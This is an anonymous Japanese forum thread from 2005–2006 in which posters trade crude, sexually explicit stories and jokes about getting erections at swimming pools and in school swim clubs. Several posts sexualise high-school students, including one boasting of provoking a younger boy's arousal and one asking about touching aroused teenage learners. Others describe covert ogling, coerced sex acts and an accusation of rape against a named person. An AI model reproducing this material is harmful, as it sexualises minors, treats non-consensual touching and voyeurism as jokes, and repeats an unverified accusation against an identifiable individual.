142 :名無しさん@お腹いっぱい。:2005/12/19(月) 20:55:50 ID:CbdGnrtv
>>140
その状況で気付かれなかったほうが
むしろ恥ずかしいと思うぞ。

よっぽどの粗チンということだからな。

ま、どっちにしろオナニーと朝立ち以外で
ちゃんと勃起する奴は羨ましい。

143 :名無しさん@お腹いっぱい。:2005/12/21(水) 17:48:59 ID:fHvwchgm
高校や大学くらいの人が水泳を習いにきて勃起して練習してたときに触ったりしたことありますか?

144 :名無しさん@お腹いっぱい。:2005/12/22(木) 06:30:35 ID:CuSFwma+
平泳ぎならあるのでは?

145 :名無しさん@お腹いっぱい。:2005/12/23(金) 00:24:48 ID:sp1LY73H
プールで勃起したら…
オレやるしかないっス!!イクしかないっス!!

146 :名無しさん@お腹いっぱい。:2005/12/24(土) 05:54:09 ID:EVoOsXJV
お気にのイントラに恋人気分になるようなこと言われた事がある

あの時はマジでプールから出られなくなった

147 :名無しさん@お腹いっぱい。:2005/12/24(土) 10:29:01 ID:IaG6zBKe
立つ時はどこでも立つのが男

148 :名無しさん@お腹いっぱい。:2005/12/24(土) 22:39:59 ID:9kuwnkuq
だよなー!じゃないとオレら男じゃねぇよ!たたない男なんて男と呼べんわ!

149 :名無しさん@お腹いっぱい。:2005/12/25(日) 23:20:50 ID:9KIuf7Je
私は大人になってから健康のために泳ぎ始めたため、水着こそ競泳用をはいていますが泳ぎはド素人です。
泳いでいる時は集中しているので気になりませんが、休憩室で一緒なった女性と話をしている時なんかは
水着姿に見とれて勃起してしまいます。
殆どの人は気が着いても見ていない振りをしますが、時には分かってしまうこともありますが、その女性
の反応も好きです。
軽く笑って「元気ですね」という人や、中には「気にしないで下さい。若い男性なら当然のことですよ」
と言ってくる人もいました。
私の話した女性は殆ど水泳経験者なので、このように普通の女性に比べてオープンなのかなあと思ってい
ます。


150 :名無しさん@お腹いっぱい。:2005/12/26(月) 20:26:54 ID:1VZ5Jny+
松田聖子は不健康 まで読んだ。


151 :名無しさん@お腹いっぱい。:2005/12/28(水) 01:52:47 ID:AkmsKkxC
淫乱

152 :名無しさん@お腹いっぱい。:2005/12/28(水) 02:10:04 ID:GKzFPtqP
swim human
foolish

153 :名無しさん@お腹いっぱい。:2005/12/28(水) 02:47:26 ID:GKzFPtqP
yOJhzgnh


154 :名無しさん@お腹いっぱい。:2005/12/29(木) 23:05:01 ID:yQtmDRpa
彼女と一緒にプール来てたらジャグジープールん中でヤッてしまうな。

155 :かずき:2005/12/31(土) 14:52:35 ID:iZqvYsDa
とりあえず近くの女子のマンコに入れる

156 : 【小吉】 【1864円】 :2006/01/01(日) 22:08:08 ID:ci4WMSTB
あけましてもっこり!!

157 :名無しさん@お腹いっぱい。:2006/01/02(月) 02:07:39 ID:zh6J9Fsy
>>149
はあはあ

158 :名無しさん@お腹いっぱい。:2006/01/02(月) 05:21:59 ID:REF/cbIn
ビラビラめくってホールに挿入★

159 :名無しさん@お腹いっぱい。:2006/01/02(月) 13:41:35 ID:lVb7Pid4
競技をしている人で、  試合のアップの時、やっぱ乳首とか見るんですか?

160 :名無しさん@お腹いっぱい。:2006/01/07(土) 09:11:43 ID:zv9b865V
すみません 皆さんはビキニパンツはいているときは、
ティンティンを上向きに収納しますか?下向きですか?

僕は下向きなんですが、パンツ(SPEEDOのうろこ模様のやつ)
にティンとフグリが抑えられて 結構圧迫感があるんで不快なん
です


161 :名無しさん@お腹いっぱい。:2006/01/07(土) 09:29:35 ID:KqcrTjp5
>>160
下向き

162 :名無しさん@お腹いっぱい。:2006/01/07(土) 17:27:26 ID:0a/alPeg
俺は初めてプールで競パン履いた時、持続性勃起症になりその競パンで泳ぐ事は二度と無かった
20センチ位の超勃起で競パンが菱形になって死ぬ程恥ずかしかったが今はその時の勃起力が懐かしい



163 :名無しさん@お腹いっぱい。:2006/01/07(土) 17:55:50 ID:p+8tQMJg
インポ野郎乙!!!
くぁwせdrftgyふじこlp

164 :名無しさん@お腹いっぱい。:2006/01/08(日) 00:22:53 ID:tOzuYoXG
>>160とかいろんな悩みがあるのねぇ。

165 :名無しさん@お腹いっぱい。:2006/01/08(日) 23:53:43 ID:sI2071AH
こないだあたしの先輩がハミ乳してた。しかもその先輩いつも乳首透けてて。んでコーチまだ若いから,先輩の乳見た瞬間ビュンッてスゴい勢いで勃起しちゃってんの!!もう出ちゃったんじゃない??ってくらい。んでぎこちない歩き方でコーチ室に逃げてっちゃって。

166 :名無しさん@お腹いっぱい。:2006/01/09(月) 11:57:23 ID:hud8qzvv
>>165勃起した瞬間を見たんだ。羨ましい!私も見てみた〜い。

167 :sage:2006/01/09(月) 13:47:21 ID:lGs7AhgK
水着着てる時、友達の女の子に後ろから胸を鷲掴みされました。
ちなみに私は女ですが。


168 :名無しさん@お腹いっぱい。:2006/01/10(火) 00:11:17 ID:mCKDg/pU
ねカマが多いね

169 :第1のコース!名無しくん:2006/01/13(金) 18:21:46 ID:uqpMraBg
さすがに大会の時に勃起はマズイから常に代替要員が控えている
勃起をしているかどうか疑わしい時は複数のマネージャーが触診して判断する
勃起者が続出してメンバーが足りなくなった時は性器が観客に見えないようマネージャーが経口で抜かせる



170 :第1のコース!名無しくん:2006/01/14(土) 20:26:03 ID:94xaO8Z+
>>169
大学時代のコーチは、コンペの前に射精すると体力が落ちる、ということで
抜き厳禁だった


171 :第1のコース!名無しくん:2006/01/15(日) 19:27:02 ID:5MYmkBqu
>>160
私のチンポは小さいから、見栄えをよくするためにも上向きにしています。
勃起しても先がパンツから出ないから、安心して勃起できます。

172 :第1のコース!名無しくん:2006/01/17(火) 22:51:18 ID:ZIO/4x+C
>>171
うらやましい!
上向きにしただけで頭が顔をちょっと出す。

173 :第1のコース!名無しくん:2006/01/19(木) 00:18:49 ID:csOmopCO
私は高校の時水泳部に入っていましたが、女子部員の水着姿にしょっちゅう興奮していました。
高校生の頃は制服姿の女の子を見るだけでも勃起していたから、ましてその子たちが水着姿に
なろう物なら興奮するのは当然でしょう。
練習がきついときはさすがに女の子のことを考える余裕はありませんが、プールサイドでの
女の子のセクシーな水着姿には勃起しまくりです。
我慢できず抱きつきたくなるときもありましたが、そういう時はとにかくトイレに行って
オナニーして慰めていました。


174 :第1のコース!名無しくん:2006/01/19(木) 00:31:30 ID:L+9eQzcv
おいらの友達も高校時代水泳部所属だったのだが男子はツレ一人しかおらんくてあとみんな女子だったらしいよ。女子の股間への視線が集中するらしくよく勃起したていってた。女子に気付かれた時もあるって言ってた。何度か一人だけの更衣室で行為したらしいよ。

175 :第1のコース!名無しくん:2006/01/19(木) 09:36:27 ID:JM9pQqsq
自分の競パンは小さいから、勃起なんかしたら一大事。平常時になんとか
横向きして入れている状態。みんなよく勃起出来るなぁ。
SSサイズで脇が3.5センチの競パンで勃起したら横腹にコブが出来るよ
うな感じ。でもそういう自分も勿論勃起することはある。ガンガン泳いでいる
時はそんな暇はないが、フーっとしたり採暖室なんかでハイレグの女の子な
ん見てスイッチが入るともうダメ・・。とたんに顔出し、うっかりすると・・
 なので、スイッチが入りそうになると予めトイレやシャワーに駆け込むよ。

176 :第1のコース!名無しくん:2006/01/19(木) 14:19:40 ID:Ojqv9Qy7
初めて競パン履いた時は勃起しまくり
競パン履いても勃起しないよう数ヶ月訓練したが駄目だった
諦めて水泳部には入らなかった



177 :第1のコース!名無しくん:2006/01/19(木) 22:07:10 ID:PX7955Xr
プールで勃起ってのがどうしても理解出来ないのだが・・・
消防のとき調子乗って出してたことはあったな
今思うとすてきなバカだった

178 :第1のコース!名無しくん:2006/01/20(金) 20:58:19 ID:Reisd7wl
水泳を志す若者の最初の試練はなんといっても勃起の沈め方。
競泳パンツの圧迫感だけで勃起する上に、周りを見れば透け乳首
丸出しの女が徘徊するのだから無理も無い。

この試練を乗り越えてこそ、真の勇者のなれるが、それは普段の
努力の賜物。毎日風俗に通って「お兄さんなかなか固くならないわね」
と言われ、「もー早く逝ってよ」と怒鳴られるまでには時間とコストが掛かる。


179 :第1のコース!名無しくん:2006/01/21(土) 03:21:18 ID:Vt2PqDcg
真の勇者

180 :第1のコース!名無しくん:2006/01/22(日) 00:24:17 ID:NEWKeoHN
>>178
女の子とHするときに勃起しなかったら、男として終わりだろ。
Hするときにビンビンに勃起してこそ真の勇者だ。






181 :第1のコース!名無しくん:2006/01/22(日) 21:52:29 ID:6Dm/siv3
高校のとき深夜のプールで全裸で遊んだ経験ある
こそーり忍び込んで水音立てないように静かに泳い
で、30分くらい遊んだあとプールから上がると、勃起
していないのにティンティンの先端からは透明汁が
じわーりとにじみ出てくる
我慢できずにストロークするとドッシャーとあふれ出る

彼女と一緒とかそういう話ならうれしいけど、一人だった
んだな



182 :第1のコース!名無しくん:2006/01/23(月) 13:27:17 ID:OtSra4DS
>>180
きっと178は男とHするときに勃起するから問題なんだよ。
アー!

183 :第1のコース!名無しくん:2006/01/23(月) 23:16:54 ID:pPJ4rYOq
高校のとき水泳部に入ったんだけど、そのときはまだ包茎だった。
友達にはズル剥けの奴もいたし、競泳パンツでは亀頭まではっきりと分かるから
男だけでなく、女の子たちにも包茎かどうかが分かってしまった。
そこで思い切ってチンポの皮を剥いた。
ズル剥けにするためその状態で競泳パンツを履いたら、亀頭にこすれて痛い。
でも、敏感な亀頭にはその刺激だけで勃起。
1年の最初は痛みと勃起をこらえながらの練習で、女の子にも笑われる始末。
それでもしばらくして亀頭が慣れるころ、勃起もしなくなりズル剥けにもなった。



184 :第1のコース!名無しくん:2006/01/24(火) 00:10:03 ID:sOPC0hZy
物凄い荒療治。

185 :第1のコース!名無しくん:2006/01/28(土) 11:53:39 ID:qeX0KNb5
キモオタのなんて見たくない。イケメンくんの勃起なら大歓迎。
高校のときイケメンで華奢な体の後輩の男の子が居たから、わざと近くで開脚前屈
するとか、コースで胸からぶつかってやるとかとかしてやると
時々はみ出しててた。

186 :第1のコース!名無しくん:2006/01/28(土) 12:24:33 ID:ALWW8OD+
ほれ、好きなだけ見ろ

 l 。|.     :,:'
  l |.          .|
.  l |. - ‐‐- ,. ‐''´ .| l
━ 〃         .| l
━ ┃      i'     .| l
 ━┛|.        .| l
 ━ 〃 ,. - ‐- ‐- | l
 ━ ┃|.  /´フ`:, | l
  ━┛ |. し'、,.、j | l
`ー-、_ ', |. |!': .;;| .| l
   ┃ヽ、l.| :  ;;| | l  ,,
   ┃、 ヽ!   ;!l l
   ┃ ヽ  ゙、  .| l/ /
    ・  \ i;;;.| / /
ヽ  、 \  ヾi/ /  /
 `ー-、\ ,ゝ-'! //´
    `´`′  } ,.. j
     ヾ、   ! .:.:ノ
       ,.ゝ.:i:.:.:'.:.
   ,. ' ,. ':,.;;;i;;;;;_:.:..、ヽ
     / ̄     ̄\
   /          \



187 :第1のコース!名無しくん:2006/01/28(土) 17:50:28 ID:5X6WTxhm
>>185お願いがある






俺にもやって

188 :第1のコース!名無しくん:2006/01/29(日) 13:46:58 ID:rN6Jdt2Y
スレッドタイトルからしてふざけているのでどうしても
DQN系キモヲタの集まりになってしまったな

189 :第1のコース!名無しくん:2006/02/02(木) 20:48:50 ID:VG7UjuzI
  (;´Д`)   シコシコシコシコ
_(ヽηノ_
  ヽ ヽ  

  ( ゚д゚ ) !
_(ヽっノ_
  ヽ ヽ

  ( ゚д゚ )   シコシコ
_(ヾηノ_
  ヽ ヽ





190 :第1のコース!名無しくん:2006/02/03(金) 01:43:30 ID:j26LEB+g
   ソVvミヘ/Wv彡vV/ ミ∠ミ::
  ミミ         _   ミ:::
  ミ    二__, --、r'"___、 ヾ ト、::ヽ
  ミレ'"~,-,、 !  ! ' '" ̄ .ノ \ヾ:、
  K/ー'~^~_/  ヽミ:ー‐‐'"   ヽ i.
 !〉 ー―'"( o ⊂! ' ヽ   ∪   Y_ 
 i  ∪  ,.:::二Uニ:::.、.       l i  
 .!     :r'エ┴┴'ーダ ∪    !Kl     それなんてエロゲ?
 .i、  .   ヾ=、__./        ト=
  ヽ. :、∪ ゙ -―-    ,; ∪ ,!
  \.  :.         .:  

191 :第1のコース!名無しくん:2006/02/05(日) 19:11:21 ID:a4fMTbQB
>>173
女の子の競泳水着姿は罪ですよね。
見ているだけで我慢するのは辛すぎます。
股間がビンビンになってしまったときは、トイレに駆け込んで一人オナニーに
ふけっています。


192 :第1のコース!名無しくん:2006/02/06(月) 12:16:04 ID:zWZprFeT
むむむんむんむんんむうんむむむんむむむん

193 :第1のコース!名無しくん:2006/02/07(火) 00:25:41 ID:FBd0tnmg
もったいない
お姉さんがなんとかしてあげる

194 :第1のコース!名無しくん:2006/02/07(火) 04:51:06 ID:U0MJ0ajW
けったいなやっちゃな

195 :第1のコース!名無しくん:2006/02/25(土) 19:20:17 ID:PrzX9t68
普通はボキしないけどね

196 :第1のコース!名無しくん:2006/03/07(火) 02:24:45 ID:rJDAOZq7
私がなんとかしてあげるわ

197 ::2006/03/07(火) 03:21:07 ID:I2752rEv
人間どもはスケベやのうー

198 :第1のコース!名無しくん:2006/03/07(火) 14:58:49 ID:NTG26ulb
よく行く公営プールの監視員の♀と挨拶するようになった。
勃起なんかしてたら嫌われてしまうので、泳ぐ前にヌク。

199 :第1のコース!名無しくん:2006/03/07(火) 16:40:06 ID:ZeJ5OMiV
わしホモなんですけど
更衣室で高校生風のヤシのお尻を見ると
ぎんぎんになっちゃいますよ。。。

200 :第1のコース!名無しくん:2006/03/07(火) 16:47:45 ID:xqhZM8fv
200

201 :第1のコース!名無しくん:2006/03/07(火) 19:38:21 ID:G/zv1GE4
>>198
俺も最初はそう思って勃起を隠そうとしていたけれど、やっぱりセクシーな競泳水着姿の
女性を目にすると股間が自動的に反応してしまう。
あるとき休憩中にプールで知り合った女性と話をしていたら勃起してしまい、それを隠そう
と腰を曲げていたら勃起をしたのがばれちゃった。
でもその子は「大丈夫です、気にしないで下さい」と言ってくれて、別に勃起した俺のこと
を変態扱いなんかしなかった。
水泳している女性は、男の生理のことは理解しているから大丈夫ですよ。

202 :第1のコース!名無しくん:2006/03/08(水) 01:38:02 ID:sQhJObxB
>>201
おーっと脳内会話キター
そんな女居るわけないじゃん 普通は「キャーこの変態」って感じの目でそそくさと逃げるよ

203 :第1のコース!名無しくん:2006/03/09(木) 23:18:07 ID:p0ONYvl2
>>202
それが水泳をやっている女性ってエロいのが多いんだよ。

204 :第1のコース!名無しくん:2006/03/10(金) 04:08:28 ID:0Xa9hKcE
ってかむっさかわいい子の水着ガン見したら誰でもボッキするって

205 :でかちん:2006/03/11(土) 02:17:24 ID:NsQ0L8nn
前にとしまえんのプールでずっと潜水しながら女性の体見まくってた!
案の定勃起しちゃったからそのプールから数十分あがれなかった!
いや〜女性の平泳ぎを後ろから見るのって幸せだよね☆

206 :第1のコース!名無しくん:2006/03/11(土) 08:34:56 ID:PhmCdkcV
↓もしかして、これ勃てたのお前かよw
ttp://pie.bbspink.com/test/read.cgi/feti/1141187247/

207 :第1のコース!名無しくん:2006/03/13(月) 23:24:52 ID:5RLxoTZA
この前陰毛が透けてる子を見てしまった。
その子がまた美人だったので、股間は即反応。
そのまま襲いたかったがそういうわけにもいかないから、
トイレに行って一発抜いた。


208 :第1のコース!名無しくん:2006/03/13(月) 23:31:15 ID:Iru093rn
ハンケツしてる女に勃ってしまうオレ

209 :あぼーん:あぼーん
あぼーん

210 :第1のコース!名無しくん:2006/03/14(火) 22:47:21 ID:JHcioWGj
>>207-208
それは立派な男ということです。
現実には勃起したくてもできなくて悩んでいる人がいるのですから、
勃起できるあなた方は大変幸せなのです。

211 :第1のコース!名無しくん:2006/03/22(水) 23:45:13 ID:xdwZbSyr
中学(水泳の授業)の時に勃起したらへそあたりまで出てきた奴とかいたぞ。
収まるまで、キャップで隠してたなw もともとでかいのの持ち主だから仕方なかったんだが。

212 :第1のコース!名無しくん:2006/03/24(金) 14:39:37 ID:zOH33LSg
タッたら女の子にレスト中に手コキしてもらってヌいて鎮静化させる!

213 :第1のコース!名無しくん:2006/03/24(金) 19:55:35 ID:kq/QLScK
不細工のマムコを想像して鎮静化させる

214 :第1のコース!名無しくん:2006/03/30(木) 14:24:35 ID:f8iMIbBN
                ∧_∧
                ( ;´∀`)
                人 Y /
               ( ヽ し
               (_)_)

             Now Bokkiing. ...


      しばらくちんちん勃ててお待ちしてください。



215 :第1のコース!名無しくん:2006/03/30(木) 15:22:32 ID:jTDwH57K
>>203だから水泳はやめられねぇぜ

216 :第1のコース!名無しくん:2006/03/30(木) 16:51:59 ID:QlW/oBBG
ここは妄想し放題のスレ?

217 :第1のコース!名無しくん:2006/04/03(月) 07:30:42 ID:zyF9Dk4J
     ,,;;-― 、__
     ノ      "⌒ヽ
    ζ          )
    /   ,ノ> ′   く 不毛なネタばかりでもうやだあたし
    i   y'  /^"ヽ、 \
   |      /      \ \
   ゝ、  _ノ .        ヽ `ヽ、__
      ̄            'ー ‐一'


218 :第1のコース!名無しくん:2006/04/11(火) 14:56:51 ID:+GdyD7vs
週何回かスポクラで泳いでて、だいたい同じ時間にオキニの子がくるんだけど、
彼女いつも競泳水着の中でも特にハイレグなマーキュライン着てて
ただでさえ半ケツなのに、プールサイドでしゃがんだ時の桃尻を見た時なんかもう…

もちろん泳ぐときはその子の後ろのポジションに(笑)
往復するたびにお尻の割れ目に水着がくいこむのを直すのがまた萌えるんだけど
今まで一番萌えたのは、彼女が食い込みを直した拍子にオナラしたとき。
水着に指を入れた瞬間…ブクブクブクブク!!
一日中がまんしてたのか、すごい大きな泡が8つくらい出てた。
そのときなんかもう股間ビンビン!もちシャワー室直行した。

219 :第1のコース!名無しくん:2006/04/11(火) 17:11:24 ID:1dgeMr0B
    .,v─ーv_         〕      〕 .|  .il゙            《 ._   .,,l(ノ^ノ
   ,i(厂  _,,,从vy      .,i「      .》;ト-v,|l′          _,ノ゙|.ミ,.゙'=,/┴y/
   l  ,zll^゙″  ゙ミ    .ノ       .il|′アll!           .>‐〕 \ _><   
   《 il|′     フーv,_ .,i″       ||}ーvrリ、             ¨'‐.`   {
    \《 ヽ     .゙li ._¨''ーv,,_     .》′  ゙゙ミ| ,r′                }
      \ ,゙r_    lア'    .゙⌒>-vzト    .ミノ′                 〕
       .゙'=ミ:┐  .「      ./ .^〃     :、_ リ                   .}
         ゙\ア'   .--  ,,ノ|    、    ゙ミ}                   :ト
           ゙^ー、,,,¨ -   ''¨.─   :!.,   リ                   ノ
              〔^ー-v、,,,_,:     i゙「   }                  .,l゙
              l!     .´゙フ'ーv .,y    ]                  '゙ミ
              |     ,/゙ .ミ;.´.‐    .]                   ミ,
              |     ノ′ ヽ      〔                   ミ
              }    }     ′    }                   {
              .|    .ミ     .<     〔                    〕
              .{     \,_   _》、    .{                    .}
              {      ¨^^¨′¨'ー-v-r《                    〔



220 :第1のコース!名無しくん:2006/05/02(火) 19:31:03 ID:MWHx+06Q
男の競パンってどうしてあんなに小さいのかしら。
勃起したら絶対におさまらないわ。
おまけにまわりは水着姿の女ばかりなのに。

勃起しても外からわからないような、だぶだぶの水着のほうが無難なのに。

好みのタイプの、競パンの男がいると、勃起させてみたくなるわ。


221 :第1のコース!名無しくん:2006/05/02(火) 19:40:48 ID:9rfMaR9Z
ホモ氏ねや

222 :第1のコース!名無しくん:2006/05/02(火) 20:39:28 ID:ZjXp2APq
222

223 :第1のコース!名無しくん:2006/05/19(金) 01:53:44 ID:i/I/RSVF
可愛い子やいい体の子を見ると、勃起してしまうことはあります。
いくら水泳をやっていてある程度免疫は出来ているとは言え、男ですから。
私は小さい競パンを履いているから勃起するとバレバレですね。
普通は勃起してもそのまま水の中に入って泳ぐと、自然と収まります。
ただ、あまりにもムラムラしてしまったときは、トイレに行って抜きます。
この時のオナニーは最高です。



224 :第1のコース!名無しくん:2006/05/19(金) 06:23:23 ID:IqVYGwdf
え〜、気持ち的には昂るんだけど、一度も勃起した事ない。

でも、彼女と風呂入ると、パンツ脱ぐ前から勃起してる。
たぶん、心の中でこれからSEXして善いという前提が無ければ
反応しないのかな?

225 :第1のコース!名無しくん:2006/05/19(金) 06:24:43 ID:IqVYGwdf
もしくは血流か?
温水といっても体温よりは水温の方が低いので、
体は心臓に血液を集めようとするから?

226 :第1のコース!名無しくん:2006/05/19(金) 10:52:23 ID:GUrBon1u
>>224
もう既にインポになりかかってるんじゃないのか?
医者に診てもらえw

227 :第1のコース!名無しくん:2006/05/19(金) 20:15:01 ID:H8aOEkzA
北陽水泳部の坂本たくみって子にゎ近付かない方がィイ……
ぅち付き合ってA日で襲われて中に出されて振られたから……↓

気つけてね(∋_∈)…↓↓
水泳やってる女の子ゎ本当に危ないからね↓↓……

228 :第1のコース!名無しくん:2006/05/21(日) 01:20:33 ID:qbP/zO3m
昔、競泳選手が全裸で泳いだらベストタイムが出たって話聞いた
ことありませんか? 実際ハイレグなんて水着は普通に考えると
かなり恥ずかしいが、皆何だかんだで着てますよね。
オリンピックで全裸は無理ですけど、Tバック水着は、「記録のため」
とか言う大義名分ではく選手は出てきそうに思います。
スピードとかアリーナが競泳用のTバック作ってくれるとオモろイッス

229 :第1のコース!名無しくん:2006/05/21(日) 21:01:54 ID:RUGKZr2f
  


     な   い    



 

230 :第1のコース!名無しくん:2006/05/27(土) 23:52:40 ID:5RJ+1sKe



   ( ´・ω・` )

231 :第1のコース!名無しくん:2006/05/31(水) 21:55:29 ID:YthrKDF5
>>1 どうするも勃ったらやむを得ず便所で抜くしかない

232 :第1のコース!名無しくん:2006/06/02(金) 00:56:52 ID:sFQZwlPb
>>231
抜いたら疲れませんか??

233 :第1のコース!名無しくん:2006/06/02(金) 02:18:03 ID:KW/Bdbfr
監視員やってれば、立つ事もあるんでは???

234 :第1のコース!名無しくん:2006/06/02(金) 10:39:39 ID:pEphoAtm
女は紐パンはいても文句ないのに、
何で男の紐パンはいけないのか?
女達がもっと見たがらなければならない

235 :第1のコース!名無しくん:2006/06/02(金) 17:55:19 ID:5rtBsytK
普通の人は勃たない

236 :第1のコース!名無しくん:2006/06/02(金) 23:31:38 ID:XuVlPbSr
可愛い子やいい体の子を見ると、勃起してしまうことはあります。
いくら水泳をやっていてある程度免疫は出来ているとは言え、男ですから。
私は小さい競パンを履いているから勃起するとバレバレですね。
普通は勃起してもそのまま水の中に入って泳ぐと、自然と収まります。
ただ、あまりにもムラムラしてしまったときは、トイレに行って抜きます。
この時のオナニーは最高です。

237 :第1のコース!名無しくん:2006/06/02(金) 23:59:16 ID:teKlXbjw
いくつ?

238 :第1のコース!名無しくん:2006/06/06(火) 10:48:27 ID:0eAM/FJC
下反りだから勃起しても、ただ単に
モノが大きい人に思われるだけ。
やったー

239 :第1のコース!名無しくん:2006/06/08(木) 15:41:10 ID:Ar1jmOvk
水泳中勃起したときは女子の先輩に見せる。すると「も〜、後でいいことしてあげるから待ってて」と言われる。
部活後必ずセックスさせてくれる。しかも中出しOK。
後輩は「せ、先輩のっておっきいね。」と言われる。さすがにセックスはさせてくれないが1時間ぐらいフェラしてくれる。

240 :第1のコース!名無しくん:2006/06/08(木) 16:51:54 ID:8SYlVDQj
http://zola.jp/4KGm7Rr.htm

241 :第1のコース!名無しくん:2006/06/08(木) 19:04:14 ID:rSC02W1O
>>239
了解。

242 :第1のコース!名無しくん:2006/06/09(金) 01:05:21 ID:UNhW4kdz
けっこう、どうどうとしているよ。

下手に隠そうと手を股間にもっていけば、それこそ変態に見えてしまう。

243 :第1のコース!名無しくん:2006/06/09(金) 10:26:28 ID:/+Op/RqM
やりたい盛りの中学生時代でも部活中は勃たなかったな。
家に帰ってから思い出しておかずにしたことはあるが

244 :第1のコース!名無しくん:2006/06/10(土) 11:09:43 ID:iJ0QQkwd
動いてるわけだから普通はたたないよね
プールサイドでも次の泳ぎのことを考えてるわけだし

たつのは遊びにきてる奴だけだろ?

245 :第1のコース!名無しくん:2006/06/14(水) 00:05:11 ID:jUUKppM/
水に入っているときは基本的に勃起しないよ
理由は知らないけど
でも、プールサイドで座ったり採暖室では確実に
硬くなるときもある
採暖室は危険 気が緩むと確実に硬化する


246 :第1のコース!名無しくん:2006/06/14(水) 00:25:17 ID:zwT++i6W
>>228
最近の水着は人肌よりも抵抗が無い生地で作られています。よって、全裸で泳ぐより競泳水着で泳いだ方が速く泳げる。
藻舞サンはただ女性の全裸姿を見たいだけでは?
ただの変態ですなw

247 :第1のコース!名無しくん:2006/06/14(水) 10:47:56 ID:hk+q7asQ
>>239
つまんねーよ

248 :第1のコース!名無しくん:2006/06/16(金) 00:58:53 ID:/Vj73/lg
>>236
普段は勃起することないけど、かわいい子やセクシーな子の水着姿にムラムラ
してしまうことはある(思わず抱きつきたくなる)。
勃起してしまったらなるべく水の中に入って隠すようにしているけど、どうにも
ムラムラしたときは、トイレに行って抜きます。
確かにこのときのオナニーは最高です。

249 :第1のコース!名無しくん:2006/06/16(金) 17:41:44 ID:sNAJhUMe
自作自演乙w

250 :第1のコース!名無しくん:2006/06/19(月) 12:04:34 ID:fT7Pu7kY
スポーツ店で競パン探してたら、大学生風の男がおばちゃん店員とやりとりしてた。
男「おれのはウルトラビキニだから、ふつーのサポータじゃダメなんです」
店「ウルトラ、、、?」
男「これなんだけど」
店「あ〜、、これでは、無理ですね」「もう横が紐だもん、どうしてもサポータ出ちゃうわ」
男「何処探しても、これより小さいサポータはないみたいです」
店「そのまま穿くしかないんじゃないかしら(笑)」「でも、小さいパンツね(笑)」
男「プールでいつはみ出るか冷や冷やしてます。」
店「おばさんたちにモテちゃうでしょ」
男「でも、勃起できないです」
店「ははは(爆)」

251 :第1のコース!名無しくん:2006/06/19(月) 13:04:54 ID:HdTFhKo6
↑?

252 :第1のコース!名無しくん:2006/06/23(金) 21:51:22 ID:xb2ka+QJ
10年ほど水泳やっていたが、勃起した記憶は全くないな・・・

水着はいていると性欲が萎えるように思う。

253 :第1のコース!名無しくん:2006/06/24(土) 20:18:04 ID:2fDLsMdh
眼鏡っ子じゃないと勃起しません

254 :第1のコース!名無しくん:2006/06/24(土) 20:34:05 ID:jLoFjVhq
248
それは昔の人は『水に入る』=『自殺する』という危険な状況をしめしていた。自殺するときにHなことは考えないでしょ?その意識が現代の自然の摂理になっていると考えられている

255 :第1のコース!名無しくん:2006/06/24(土) 20:46:57 ID:rS+EianB
ていうか、多少経験があると水着どころか真っ裸でも起たないようにするのは
むずかしくないとおもうのだけど・・・

プール程度で簡単に起つのは免疫の無い証拠じゃね?


256 :第1のコース!名無しくん:2006/06/25(日) 22:34:36 ID:QkHvxbK9
>>250
必死で熟女をナンパするいんちき水泳師の悲しいお話


257 :第1のコース!名無しくん :2006/07/01(土) 20:34:40 ID:+Uqf37hc
男子校なのに
水泳の時間勃起してしまいます。


258 :第1のコース!名無しくん:2006/07/02(日) 10:13:41 ID:QHiQ4lR8
なんかこのスレ見てたらオナニーしたくなってきた

259 :第1のコース!名無しくん:2006/07/09(日) 03:54:52 ID:VUOo0nUU
某プールで監視員のバイトをしたとき、たまたまビキニを着た若い女の子たちに道を尋ねられました。
私は水泳をずっとやっているので女の子の水着を見てもほとんど平気だったが、あの時の彼女たちは
違いました。
多分4人ぐらいの女子大生だっと思うのですが、みんなビキニですごくセクシーでした。
ルックスもよかったのですが、とにかく豊満な子がいたのです。
私はムズムズして勃起してしまいました。
彼女たちとは直ぐに別れたので、勃起したのは気づかれませんでしたが、後でおかずに
して抜いたのは言うまでもありません。
(水泳をしていても、ビキニ姿を見ることはまずありませんから、それが意外だったのかも)

260 :第1のコース!名無しくん:2006/07/09(日) 04:38:39 ID:0TLuyD31
水泳やってたら・・水泳部のムッチリボディに1サイズアンダーの
ハイレグやろボケ。ど素人のビキニに欲情するやつは偽者。


261 :第1のコース!名無しくん:2006/07/09(日) 17:11:48 ID:gCyThBXs
隆起しない競泳ばかども

262 :第1のコース!名無しくん:2006/07/09(日) 20:14:34 ID:VUOo0nUU
>>260
普通のレジャープールの話だけど。
水泳やっているから、女性の競泳水着にはかなり免疫ができているけど、むっちり
した子のビキニ姿は免疫が無いんだよw
体型も水泳をやっている子とは違っていい意味で締まっていないから、逆にそこが
エロいんだ。

263 :第1のコース!名無しくん:2006/07/09(日) 21:15:00 ID:opNgM3+k
>>262 そうか? 
オレは逆にビキニのが見慣れてて
競泳水着のがそそられるな(ハイレグに限るが...

まぁどっちにしても勃起はしないがナーw

264 :第1のコース!名無しくん:2006/07/09(日) 22:30:15 ID:VUOo0nUU
>>263
マジレスすると、セクシーな水着姿の女性で勃起しないのは、男としてヤバイぞ!
インポの手前、というかもうなっているのでは?
男なら、女性の水着姿で欲情するのが自然だよ。

265 :第1のコース!名無しくん:2006/07/10(月) 14:06:32 ID:oMfRt89P
輝かしい私の人生で、たったひとつだけ誰にも言えなかった汚点がある。
それは高校1年の夏、水泳の授業中に勃起してしまったことだ。
もちろん勃起することは、男としてむしろ誇らしいことと言えるだろう。
しかし、同性の水着姿で勃起してしまったとしたら、不覚であるとしか言えまい。
その日、水泳部の同級生の細いパンツから臀裂がみえていることに気づき、
私の視線はその卑猥ともとれる水着姿に釘付けとなってしまったのだ。
その日から、自分は変態ではないかと悩み苦しんだ。
しかし、私の理不尽な欲求はその同級生と同じ形の水着を着けることですべて満たされた。
「男性用競泳水着」というものに対する強い興味だけが残り、ゲイの道に走ることはまったくなかったのだ。

266 :第1のコース!名無しくん:2006/07/11(火) 00:25:36 ID:btM6lKEP
僕も男子の競泳水着見て勃起したことあります。そのあとおかずにして…

267 :第1のコース!名無しくん:2006/07/11(火) 22:27:33 ID:4y4BTycG
アッー!

268 :第1のコース!名無しくん:2006/07/24(月) 00:20:43 ID:Y5b3pWj7
水泳の授業で、女子の水着姿を見ていたら、興奮して激しく勃起してしまいました。
このままではやばかったので、トイレに行って速攻で抜きました。
でも、また勃起。
女子の水着はたまりません。


269 :第1のコース!名無しくん:2006/07/24(月) 10:04:22 ID:NSt2Sgtd
俺の平泳ぎの後をいつもつけて来る
